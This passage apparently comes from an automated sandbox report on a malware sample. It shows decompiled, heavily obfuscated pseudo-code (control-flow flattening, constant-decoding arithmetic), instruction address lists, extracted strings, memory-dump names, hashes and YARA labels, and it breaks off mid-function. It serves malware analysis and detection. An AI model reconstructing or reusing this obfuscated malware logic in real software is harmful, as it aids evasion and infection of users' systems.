						if(_t385 == 0x95c790a) {
							_t384 = E00BD3231(_v1632, _v1592, _v1640);
							_t435 =  &(_t435[3]);
							__eflags = _t384;
							if(_t384 == 0) {
								_t385 = 0xde41895;
								_t413 = 0x5c;
								goto L25;
							} else {
								_t385 = 0x2370cca;
								goto L1;
							}
						} else {
							__eflags = _t385 - 0xa1bcbfc;
							if(__eflags == 0) {
								_push(0xbb144c);
								_t366 = E00BD0AD3(_v1628, _v1564, __eflags);
								E00BD2C16( &_v1040, __eflags);
								E00BCB062( &_v520, __eflags,  *0xbd5bd8 + 0x238, _v1680, _v1652, _t366, _v1600, 0x104, _v1608,  *0xbd5bd8 + 0x30,  &_v1040,  &_v1560, _v1616);
								E00BC2EED(_v1684, _v1656, _v1664, _t366);
								_t435 =  &(_t435[0xe]);
								_t385 = 0x94d2245;
								while(1) {
									L1:
									_t413 = 0x5c;
									goto L2;
								}
							} else {
								__eflags = _t385 - 0xd3e2153;
								if(_t385 != 0xd3e2153) {
									goto L25;
								} else {
									E00BC3130(_t384, _t434, _v1688, _v1572);
									_t435 =  &(_t435[3]);
									_t385 = 0x5337573;
									while(1) {
										L1:
										_t413 = 0x5c;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L25:
						__eflags = _t385 - 0xde41895;
					} while (_t385 != 0xde41895);
					goto L28;
				}
			}

0x00bc3abe
0x00bc3ac4
0x00bc3ace
0x00bc3ad6
0x00bc3adb
0x00bc3ae3
0x00bc3aee
0x00bc3af9
0x00bc3b04
0x00bc3b1c
0x00bc3b21
0x00bc3b2a
0x00bc3b35
0x00bc3b42
0x00bc3b45
0x00bc3b4d
0x00bc3b51
0x00bc3b59
0x00bc3b5e
0x00bc3b66
0x00bc3b6e
0x00bc3b76
0x00bc3b86
0x00bc3b8a
0x00bc3b92
0x00bc3b9a
0x00bc3ba2
0x00bc3baa
0x00bc3baf
0x00bc3bb7
0x00bc3bbf
0x00bc3bc7
0x00bc3bcc
0x00bc3bd4
0x00bc3bdc
0x00bc3be1
0x00bc3be5
0x00bc3bed
0x00bc3bf5
0x00bc3c01
0x00bc3c06
0x00bc3c10
0x00bc3c13
0x00bc3c17
0x00bc3c1f
0x00bc3c27
0x00bc3c2c
0x00bc3c34
0x00bc3c3c
0x00bc3c44
0x00bc3c49
0x00bc3c51
0x00bc3c59
0x00bc3c61
0x00bc3c69
0x00bc3c71
0x00bc3c7c
0x00bc3c84
0x00bc3c8f
0x00bc3c97
0x00bc3c9f
0x00bc3ca4
0x00bc3cae
0x00bc3cb6
0x00bc3cbe
0x00bc3cc6
0x00bc3cce
0x00bc3cd6
0x00bc3cde
0x00bc3ce3
0x00bc3ceb
0x00bc3cf6
0x00bc3cfe
0x00bc3d09
0x00bc3d1d
0x00bc3d22
0x00bc3d2b
0x00bc3d36
0x00bc3d3e
0x00bc3d46
0x00bc3d4e
0x00bc3d56
0x00bc3d5e
0x00bc3d63
0x00bc3d6b
0x00bc3d73
0x00bc3d7b
0x00bc3d83
0x00bc3d8b
0x00bc3d93
0x00bc3d9b
0x00bc3da3
0x00bc3dab
0x00bc3db3
0x00bc3dbb
0x00bc3dc3
0x00bc3dcb
0x00bc3dd3
0x00bc3ddb
0x00bc3de0
0x00bc3de8
0x00bc3df4
0x00bc3df9
0x00bc3dff
0x00bc3e04
0x00bc3e0c
0x00bc3e14
0x00bc3e26
0x00bc3e2b
0x00bc3e34
0x00bc3e3f
0x00bc3e47
0x00bc3e4f
0x00bc3e54
0x00bc3e59
0x00bc3e61
0x00bc3e69
0x00bc3e6e
0x00bc3e76
0x00bc3e7e
0x00bc3e8a
0x00bc3e8d
0x00bc3e91
0x00bc3e99
0x00bc3ea1
0x00bc3ea9
0x00bc3eb1
0x00bc3eb9
0x00bc3ebe
0x00bc3ec6
0x00bc3ece
0x00bc3ed6
0x00bc3ede
0x00bc3ee3
0x00bc3eeb
0x00bc3ef6
0x00bc3f01
0x00bc3f0c
0x00bc3f17
0x00bc3f22
0x00bc3f2d
0x00bc3f35
0x00bc3f3d
0x00bc3f45
0x00bc3f4a
0x00bc3f52
0x00bc3f5d
0x00bc3f68
0x00bc3f73
0x00bc3f7b
0x00bc3f83
0x00bc3f88
0x00bc3f90
0x00bc3f97
0x00bc3f9e
0x00bc3fa5
0x00bc3fb0
0x00bc3fb8
0x00bc3fc3
0x00bc3fce
0x00bc3fd6
0x00bc3fe1
0x00bc3fe9
0x00bc3fee
0x00bc3ff6
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00bc4001
0x00bc4001
0x00bc4001
0x00bc4001
0x00bc4007
0x00000000
0x00000000
0x00bc400d
0x00bc410c
0x00bc4114
0x00bc4114
0x00bc4117
0x00000000
0x00000000
0x00bc4111
0x00bc4111
0x00bc4111
0x00bc4119
0x00bc411c
0x00000000
0x00bc4013
0x00bc4019
0x00bc40e8
0x00bc40ea
0x00bc40ed
0x00bc40ef
0x00000000
0x00bc40f1
0x00bc40f1
0x00bc40f6
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00000000
0x00bc4000
0x00bc3ffe
0x00bc401b
0x00bc4021
0x00bc4250
0x00bc4027
0x00bc402d
0x00bc4083
0x00bc4089
0x00bc4089
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00000000
0x00bc4000
0x00bc402f
0x00bc4035
0x00000000
0x00bc403b
0x00bc403b
0x00bc4067
0x00bc406c
0x00bc406f
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00000000
0x00bc4000
0x00bc3ffe
0x00bc4035
0x00bc402d
0x00bc4021
0x00bc4019
0x00bc4256
0x00bc4267
0x00bc4267
0x00bc4126
0x00bc412c
0x00bc421a
0x00bc421c
0x00bc421f
0x00bc4221
0x00bc422f
0x00bc4234
0x00000000
0x00bc4223
0x00bc4223
0x00000000
0x00bc4223
0x00bc4132
0x00bc4132
0x00bc4138
0x00bc4178
0x00bc417d
0x00bc418b
0x00bc41df
0x00bc41f4
0x00bc41f9
0x00bc41fc
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00000000
0x00bc4000
0x00bc413a
0x00bc413a
0x00bc4140
0x00000000
0x00bc4146
0x00bc415b
0x00bc4160
0x00bc4163
0x00bc3ffe
0x00bc3ffe
0x00bc4000
0x00000000
0x00bc4000
0x00bc3ffe
0x00bc4140
0x00bc4138
0x00000000
0x00bc4235
0x00bc4235
0x00bc4235
0x00000000
0x00bc4241

Strings

y\, xrefs: 00BC4126
yxO, xrefs: 00BC3B66
/t6, xrefs: 00BC3F68
y\, xrefs: 00BC411C
:O, xrefs: 00BC3BED
S!>, xrefs: 00BC413A
[^, xrefs: 00BC3FD6
5L, xrefs: 00BC3FE1
E"M, xrefs: 00BC41FC
E"M, xrefs: 00BC4001
IiS, xrefs: 00BC3D8B
S!>, xrefs: 00BC40F1
E, xrefs: 00BC3D73
B|!, xrefs: 00BC3E76

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: y\$y\$5L$:O$B|!$E"M$E"M$E$IiS$S!>$S!>$[^$yxO$/t6
API String ID: 0-1388136749
Opcode ID: 1944dd246fa83128b976b51bc057ec91dd267081e3918a52965fa39994076b5c
Instruction ID: 6fdb0b4379772ec59eebb50258ab8a35e915c3a1cc9fcc2f24f5cabf5e8556ea
Opcode Fuzzy Hash: 1944dd246fa83128b976b51bc057ec91dd267081e3918a52965fa39994076b5c
Instruction Fuzzy Hash: 7E0245B15083809FD3A4CF61C94AA9BBBE1FBD4358F10891DF2DA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1A6D0, Relevance: 15.7, Strings: 11, Instructions: 1959COMMON

Download Yara Rule

Strings

$, xrefs: 6ED1BA23
__ZN, xrefs: 6ED1ABD7
SizeLimitExhausted, xrefs: 6ED1C0D9
.assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ED1BB04, 6ED1BEC7
h, xrefs: 6ED1B6EB
`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6ED1B3C9
called `Result::unwrap()` on an `Err` value, xrefs: 6ED1BF8D
$, xrefs: 6ED1BA33
.llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy, xrefs: 6ED1A6ED
@*&<>()C,, xrefs: 6ED1BE70, 6ED1BF32
called `Option::unwrap()` on a `None` value, xrefs: 6ED1BF6E

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $$$$.assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb$.llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
API String ID: 0-2155986594
Opcode ID: 04e4c49b376e5119c0543d2484d6b03823f7ce962918ab40f66984d9a2a8f5c2
Instruction ID: 53909ccfbb69356acc3b7110a482d7fc5895971b23102325cb75d6c733334fa2
Opcode Fuzzy Hash: 04e4c49b376e5119c0543d2484d6b03823f7ce962918ab40f66984d9a2a8f5c2
Instruction Fuzzy Hash: 34E2E171A0C352CFD714CF98E49069AB7E2ABC9354F148A1DE4E58B3D9D731D849CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4DC5, Relevance: 15.4, Strings: 12, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00BC4DC5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				unsigned int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				unsigned int _v444;
				signed int _v448;
				void* _t395;
				void* _t428;
				intOrPtr _t431;
				void* _t436;
				void* _t445;
				void* _t447;
				intOrPtr _t452;
				void* _t457;
				char _t459;
				void* _t462;
				intOrPtr _t465;
				intOrPtr _t468;
				void* _t476;
				intOrPtr _t500;
				void* _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				void* _t521;
				signed int* _t524;
				void* _t528;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00BB8002(_t395);
				_v272 = 0x5a47d6;
				_v268 = 0xcdc82b;
				_t524 =  &(( &_v448)[7]);
				_v264 = 0;
				_v260 = 0;
				_t459 = 0;
				_v380 = 0x9af564;
				_t462 = 0x9b977d1;
				_v380 = _v380 | 0xf74b0d84;
				_v380 = _v380 ^ 0xf7dca480;
				_v344 = 0x540e9c;
				_v344 = _v344 << 0xa;
				_v344 = _v344 + 0xe1d3;
				_v344 = _v344 ^ 0x503abdcd;
				_v328 = 0xf12931;
				_v328 = _v328 ^ 0xa94b556c;
				_v328 = _v328 ^ 0xa9bd52be;
				_v312 = 0x15bd18;
				_v312 = _v312 + 0x6a68;
				_v312 = _v312 ^ 0x00142ff3;
				_v400 = 0xf8b297;
				_v400 = _v400 + 0x5900;
				_v400 = _v400 ^ 0x448368c2;
				_v400 = _v400 << 0xe;
				_v400 = _v400 ^ 0x98da3f37;
				_v408 = 0x455919;
				_v408 = _v408 ^ 0xe2f437fc;
				_v408 = _v408 + 0x7be8;
				_t512 = 7;
				_v408 = _v408 * 0x79;
				_v408 = _v408 ^ 0x2610f865;
				_v336 = 0xe9e066;
				_v336 = _v336 ^ 0x491e36a5;
				_v336 = _v336 + 0x9cb6;
				_v336 = _v336 ^ 0x49ffae15;
				_v404 = 0x424109;
				_v404 = _v404 ^ 0xd76d8019;
				_v404 = _v404 ^ 0x92772264;
				_v404 = _v404 + 0xb73f;
				_v404 = _v404 ^ 0x455d24f6;
				_v444 = 0x8359bf;
				_v444 = _v444 << 0xc;
				_v444 = _v444 ^ 0x2ccbcef6;
				_v444 = _v444 >> 0xa;
				_v444 = _v444 ^ 0x000364ce;
				_v348 = 0xc8c19d;
				_v348 = _v348 | 0xc8237a79;
				_v348 = _v348 + 0xffff77b1;
				_v348 = _v348 ^ 0xc8e5237e;
				_v324 = 0x586a31;
				_v324 = _v324 ^ 0x6ef7158d;
				_v324 = _v324 ^ 0x6ea50117;
				_v332 = 0x1aea29;
				_v332 = _v332 >> 4;
				_v332 = _v332 ^ 0x0007a663;
				_v320 = 0x2348f9;
				_v320 = _v320 / _t512;
				_v320 = _v320 ^ 0x0006b713;
				_v416 = 0xd6b60d;
				_v416 = _v416 >> 1;
				_t513 = 0x35;
				_v416 = _v416 / _t513;
				_v416 = _v416 >> 4;
				_v416 = _v416 ^ 0x000e647a;
				_v304 = 0x2421ff;
				_v304 = _v304 | 0xdd5513fd;
				_v304 = _v304 ^ 0xdd7f87c6;
				_v376 = 0x30f67f;
				_v376 = _v376 + 0xffff5f71;
				_t514 = 0x71;
				_v376 = _v376 * 0x5a;
				_v376 = _v376 ^ 0x10f37e1a;
				_v424 = 0x471699;
				_v424 = _v424 * 0x69;
				_v424 = _v424 + 0xffffda63;
				_v424 = _v424 << 1;
				_v424 = _v424 ^ 0x3a5a74b6;
				_v432 = 0x460bc5;
				_v432 = _v432 / _t514;
				_t515 = 0x21;
				_v432 = _v432 * 0x72;
				_v432 = _v432 ^ 0xdf4a5a43;
				_v432 = _v432 ^ 0xdf02b34f;
				_v440 = 0xb2e4bc;
				_v440 = _v440 >> 0xd;
				_v440 = _v440 | 0xfa76fd7d;
				_v440 = _v440 ^ 0xfa7dfc63;
				_v384 = 0x24910;
				_v384 = _v384 | 0xf5288b13;
				_v384 = _v384 + 0x6fdd;
				_v384 = _v384 ^ 0xf52d2ab6;
				_v300 = 0x92d249;
				_v300 = _v300 + 0xe9aa;
				_v300 = _v300 ^ 0x00915407;
				_v352 = 0x441970;
				_v352 = _v352 + 0x24ff;
				_v352 = _v352 + 0xffff9ab6;
				_v352 = _v352 ^ 0x004d5352;
				_v360 = 0xf364f3;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xa;
				_v360 = _v360 ^ 0x0004c95a;
				_v392 = 0x3b4b3b;
				_v392 = _v392 ^ 0xf339efed;
				_v392 = _v392 ^ 0x149fa142;
				_v392 = _v392 | 0x817fda2d;
				_v392 = _v392 ^ 0xe7fbdc79;
				_v368 = 0x7be028;
				_t191 =  &_v368; // 0x7be028
				_v368 =  *_t191 / _t515;
				_t197 =  &_v368; // 0x7be028
				_t516 = 0x7b;
				_v368 =  *_t197 * 0x61;
				_v368 = _v368 ^ 0x016ef7c8;
				_v412 = 0x7d1814;
				_v412 = _v412 / _t516;
				_v412 = _v412 << 0xa;
				_v412 = _v412 >> 5;
				_v412 = _v412 ^ 0x002b2dab;
				_v308 = 0xd80031;
				_v308 = _v308 << 0xf;
				_v308 = _v308 ^ 0x0010937b;
				_v372 = 0xcdc7ad;
				_v372 = _v372 << 2;
				_t517 = 0x4a;
				_v372 = _v372 / _t517;
				_v372 = _v372 ^ 0x000a2ad9;
				_v356 = 0xb552ba;
				_v356 = _v356 << 6;
				_v356 = _v356 + 0xffff22d1;
				_v356 = _v356 ^ 0x2d5b6008;
				_v316 = 0xd960cf;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 ^ 0x000d4b20;
				_v396 = 0x463e61;
				_v396 = _v396 ^ 0xa3b97e26;
				_v396 = _v396 + 0xb044;
				_v396 = _v396 << 0xf;
				_v396 = _v396 ^ 0xf8451024;
				_v428 = 0x8fa30a;
				_v428 = _v428 | 0xec92375e;
				_t518 = 0x50;
				_v428 = _v428 * 0x78;
				_v428 = _v428 / _t518;
				_v428 = _v428 ^ 0x02e6bcde;
				_v340 = 0x7b21f4;
				_v340 = _v340 | 0x015d5af8;
				_v340 = _v340 ^ 0xbe35f651;
				_v340 = _v340 ^ 0xbf41a612;
				_v388 = 0x51cd38;
				_v388 = _v388 + 0x307c;
				_v388 = _v388 + 0xdc67;
				_v388 = _v388 ^ 0x005e821e;
				_v448 = 0x5176eb;
				_t280 =  &_v448; // 0x5176eb
				_t519 = 0x17;
				_v448 =  *_t280 / _t519;
				_t286 =  &_v448; // 0x5176eb
				_t520 = 0x5d;
				_v448 =  *_t286 * 0xb;
				_v448 = _v448 >> 0x10;
				_v448 = _v448 ^ 0x000e569b;
				_v364 = 0xe45033;
				_t293 =  &_v364; // 0xe45033
				_v364 =  *_t293 * 0x22;
				_t295 =  &_v364; // 0xe45033
				_v364 =  *_t295 * 0x22;
				_v364 = _v364 ^ 0x06f7650a;
				_v420 = 0xf59819;
				_v420 = _v420 + 0xffff9a2e;
				_v420 = _v420 * 0x3f;
				_v420 = _v420 >> 7;
				_v420 = _v420 ^ 0x0076e6cb;
				_v436 = 0x9d9870;
				_v436 = _v436 + 0xffff85b4;
				_v436 = _v436 ^ 0x73b46595;
				_t521 = _v380;
				_v436 = _v436 / _t520;
				_v436 = _v436 ^ 0x013d0554;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t528 = _t462 - 0x8b2ef1f;
							if(_t528 > 0) {
								break;
							}
							if(_t528 == 0) {
								_t468 =  *((intOrPtr*)( *0xbd5214 + 0x24));
								_t355 = _t468 + 0x30; // 0xbb53f0
								_t356 = _t468 + 0x28; // 0x13e85652
								_t361 =  *((intOrPtr*)( *0xbd5214 + 0x24)) + 0x50; // 0xf4456b00
								_t445 = E00BB996C( &_v288, _v304, _t521, _v376,  &_v280,  *_t361 & 0x0000ffff, _v424,  &_v256, _v432,  *_t356 & 0x0000ffff, _t355);
								_t524 =  &(_t524[0xa]);
								if(_t445 == 0) {
									L21:
									_t462 = 0x40f5062;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t462 = 0x20796c8;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t462 == 0x20796c8) {
									_t447 = E00BC0A37(_v440, _v384, _v300, _a16,  &_v280);
									_t524 =  &(_t524[3]);
									if(_t447 == 0) {
										_t511 = 0xcbc2bff;
									} else {
										_t511 = 0xe01f896;
										_t459 = 1;
									}
									_t462 = 0xb55e81b;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									if(_t462 == 0x40f5062) {
										E00BBF699(_v412, _v296, _v308, _v372, _v356);
										E00BBF699(_v316, _t521, _v396, _v428, _v340);
										E00BBF699(_v388, _v288, _v448, _v364, _v420);
										_t524 =  &(_t524[9]);
										_t462 = _t511;
										L34:
										_t428 = 0x6ea9b1a;
										goto L35;
									} else {
										if(_t462 == 0x4ffd51f) {
											if(_v292 >= _v436) {
												_t452 = E00BCD5FE( &_v296,  &_v288);
											} else {
												_t452 = E00BD1C71( &_v296);
											}
											_t521 = _t452;
											_t428 = 0x6ea9b1a;
											_t462 =  !=  ? 0x6ea9b1a : 0x40f5062;
											continue;
										} else {
											if(_t462 != _t428) {
												goto L35;
											} else {
												_push(_t462);
												_push(1);
												_push(_t462);
												_push(_t462);
												_t476 = 0x40;
												_t457 = E00BC2CCF(_t476);
												_push( &_v256);
												_push(_v320);
												_push(_t457);
												_push(0xb);
												E00BC8601(_v324, _v332);
												_t524 =  &(_t524[8]);
												_t462 = 0x8b2ef1f;
												while(1) {
													L1:
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t459;
						}
						if(_t462 == 0x9b977d1) {
							_t521 = 0;
							E00BB3965(_v380, _v344,  &_v256, _v328, 0x100, _v312);
							_t524 =  &(_t524[4]);
							_v288 = 0;
							_v284 = 0;
							_t462 = 0xd5ae00f;
							_v296 = 0;
							_v292 = 0;
							goto L34;
						} else {
							if(_t462 == 0xb55e81b) {
								E00BBF699(_v352, _v280, _v360, _v392, _v368);
								_t524 =  &(_t524[3]);
								goto L21;
							} else {
								if(_t462 == 0xcbc2bff) {
									_t465 =  *0xbd5214;
									_t372 =  *((intOrPtr*)(_t465 + 0x24)) + 0x1c; // 0x1075ff56
									_t431 =  *_t372;
									 *((intOrPtr*)(_t465 + 0x34)) =  *((intOrPtr*)(_t465 + 0x34)) + 1;
									_t500 =  *((intOrPtr*)(_t465 + 0x34));
									 *((intOrPtr*)(_t465 + 0x24)) = _t431;
									if(_t431 == 0) {
										 *((intOrPtr*)(_t465 + 0x24)) =  *((intOrPtr*)(_t465 + 0x14));
									}
									if(_t500 >=  *((intOrPtr*)( *0xbd5214 + 0x10))) {
										 *((intOrPtr*)( *0xbd5214 + 0x34)) = 0;
									} else {
										_t462 = 0x9b977d1;
										goto L1;
									}
								} else {
									if(_t462 != 0xd5ae00f) {
										goto L35;
									} else {
										_t436 = E00BCB0BA(_v400, _a12, _v408,  &_v296, _a4);
										_t524 =  &(_t524[3]);
										if(_t436 != 0) {
											_t462 = 0x4ffd51f;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t462 != 0xe01f896);
					goto L38;
				}
			}

0x00bc4dcf
0x00bc4dd6
0x00bc4ddd
0x00bc4de4
0x00bc4deb
0x00bc4df2
0x00bc4df3
0x00bc4df4
0x00bc4df9
0x00bc4e06
0x00bc4e11
0x00bc4e14
0x00bc4e1d
0x00bc4e24
0x00bc4e26
0x00bc4e2e
0x00bc4e33
0x00bc4e3b
0x00bc4e43
0x00bc4e4b
0x00bc4e50
0x00bc4e58
0x00bc4e60
0x00bc4e6b
0x00bc4e76
0x00bc4e81
0x00bc4e8c
0x00bc4e97
0x00bc4ea2
0x00bc4eaa
0x00bc4eb2
0x00bc4eba
0x00bc4ebf
0x00bc4ec7
0x00bc4ecf
0x00bc4ed7
0x00bc4ee6
0x00bc4ee9
0x00bc4eed
0x00bc4ef5
0x00bc4f00
0x00bc4f0b
0x00bc4f16
0x00bc4f21
0x00bc4f29
0x00bc4f31
0x00bc4f39
0x00bc4f41
0x00bc4f49
0x00bc4f51
0x00bc4f56
0x00bc4f5e
0x00bc4f63
0x00bc4f6b
0x00bc4f73
0x00bc4f7b
0x00bc4f83
0x00bc4f8b
0x00bc4f96
0x00bc4fa1
0x00bc4fac
0x00bc4fb7
0x00bc4fbf
0x00bc4fca
0x00bc4fde
0x00bc4fe5
0x00bc4ff0
0x00bc4ff8
0x00bc5002
0x00bc5007
0x00bc500d
0x00bc5012
0x00bc501a
0x00bc5025
0x00bc5030
0x00bc503b
0x00bc5043
0x00bc5050
0x00bc5053
0x00bc5057
0x00bc505f
0x00bc506c
0x00bc5070
0x00bc5078
0x00bc507c
0x00bc5084
0x00bc5094
0x00bc509d
0x00bc50a0
0x00bc50a4
0x00bc50ac
0x00bc50b4
0x00bc50bc
0x00bc50c1
0x00bc50c9
0x00bc50d1
0x00bc50d9
0x00bc50e1
0x00bc50e9
0x00bc50f1
0x00bc50fc
0x00bc5107
0x00bc5112
0x00bc511a
0x00bc5122
0x00bc512a
0x00bc5132
0x00bc513a
0x00bc513f
0x00bc5144
0x00bc514c
0x00bc5154
0x00bc515c
0x00bc5164
0x00bc516c
0x00bc5174
0x00bc517c
0x00bc5184
0x00bc5188
0x00bc518d
0x00bc518e
0x00bc5192
0x00bc519a
0x00bc51a8
0x00bc51ac
0x00bc51b1
0x00bc51b6
0x00bc51be
0x00bc51c9
0x00bc51d1
0x00bc51dc
0x00bc51e4
0x00bc51f1
0x00bc51f6
0x00bc51fc
0x00bc5204
0x00bc520c
0x00bc5211
0x00bc5219
0x00bc5221
0x00bc522c
0x00bc5234
0x00bc523f
0x00bc5247
0x00bc524f
0x00bc5257
0x00bc525c
0x00bc5264
0x00bc526c
0x00bc5279
0x00bc5280
0x00bc528c
0x00bc5290
0x00bc5298
0x00bc52a3
0x00bc52ae
0x00bc52b9
0x00bc52c4
0x00bc52cc
0x00bc52d4
0x00bc52dc
0x00bc52e4
0x00bc52ec
0x00bc52f0
0x00bc52f5
0x00bc52fb
0x00bc5300
0x00bc5301
0x00bc5305
0x00bc530a
0x00bc5312
0x00bc531a
0x00bc531f
0x00bc5323
0x00bc5328
0x00bc532c
0x00bc5334
0x00bc533c
0x00bc5349
0x00bc534d
0x00bc5352
0x00bc535a
0x00bc5362
0x00bc536a
0x00bc5378
0x00bc537c
0x00bc5380
0x00bc5388
0x00bc5388
0x00bc538d
0x00bc538d
0x00bc538d
0x00bc538d
0x00bc5393
0x00000000
0x00000000
0x00bc5399
0x00bc550a
0x00bc550d
0x00bc5511
0x00bc552e
0x00bc554b
0x00bc5550
0x00bc5555
0x00bc5566
0x00bc5566
0x00bc5388
0x00bc5388
0x00000000
0x00bc5388
0x00bc5557
0x00bc5557
0x00bc5388
0x00bc5388
0x00000000
0x00bc5388
0x00bc5388
0x00bc539f
0x00bc53a5
0x00bc54d9
0x00bc54de
0x00bc54e3
0x00bc54ef
0x00bc54e5
0x00bc54e7
0x00bc54ec
0x00bc54ec
0x00bc54f4
0x00bc5388
0x00bc5388
0x00000000
0x00bc5388
0x00bc53ab
0x00bc53b1
0x00bc5470
0x00bc548d
0x00bc54ac
0x00bc54b1
0x00bc54b4
0x00bc5680
0x00bc5680
0x00000000
0x00bc53b7
0x00bc53bd
0x00bc542b
0x00bc543b
0x00bc542d
0x00bc542d
0x00bc542d
0x00bc5440
0x00bc5449
0x00bc544e
0x00000000
0x00bc53bf
0x00bc53c1
0x00000000
0x00bc53c7
0x00bc53da
0x00bc53db
0x00bc53dd
0x00bc53de
0x00bc53e1
0x00bc53e2
0x00bc53ee
0x00bc53ef
0x00bc5404
0x00bc5405
0x00bc5407
0x00bc540c
0x00bc540f
0x00bc5388
0x00bc5388
0x00000000
0x00bc5388
0x00bc5388
0x00bc53c1
0x00bc53bd
0x00bc53b1
0x00bc53a5
0x00bc569f
0x00bc56a8
0x00bc56a8
0x00bc5576
0x00bc563d
0x00bc5657
0x00bc565c
0x00bc565f
0x00bc5666
0x00bc566d
0x00bc5672
0x00bc5679
0x00000000
0x00bc557c
0x00bc5582
0x00bc5622
0x00bc5627
0x00000000
0x00bc5588
0x00bc558e
0x00bc55d4
0x00bc55dd
0x00bc55dd
0x00bc55e0
0x00bc55e3
0x00bc55e6
0x00bc55eb
0x00bc55f0
0x00bc55f0
0x00bc55fb
0x00bc5699
0x00bc5601
0x00bc5601
0x00000000
0x00bc5601
0x00bc5590
0x00bc5596
0x00000000
0x00bc559c
0x00bc55ba
0x00bc55bf
0x00bc55c4
0x00bc55ca
0x00bc5388
0x00bc5388
0x00000000
0x00bc5388
0x00bc5388
0x00bc55c4
0x00bc5596
0x00bc558e
0x00bc5582
0x00000000
0x00bc5685
0x00bc5685
0x00000000
0x00bc5691

Strings

1, xrefs: 00BC51BE
K, xrefs: 00BC5234
vQ, xrefs: 00BC52EC
AB, xrefs: 00BC4F21
RSM, xrefs: 00BC512A
f, xrefs: 00BC4EF5
{, xrefs: 00BC4ED7
({, xrefs: 00BC517C
;K;, xrefs: 00BC514C
a>F, xrefs: 00BC523F
|0, xrefs: 00BC52CC
1jX, xrefs: 00BC4F8B

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: AB$ K$({$1$1jX$;K;$RSM$a>F$f$|0$vQ${
API String ID: 0-3105251626
Opcode ID: 0efef12769f3af8c5493b8c6101411a9b933133f7968e268e48e3640e3656edc
Instruction ID: a711ebdb0d73aa5a66a1f8e55975b961d63af239ea138dae309c05e0350710b8
Opcode Fuzzy Hash: 0efef12769f3af8c5493b8c6101411a9b933133f7968e268e48e3640e3656edc
Instruction Fuzzy Hash: 552245B1509380DFD378CF25C58AA9BBBE1FBC4708F10891DE59A8A260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0C66, Relevance: 14.3, Strings: 11, Instructions: 552
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00BD0C66(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
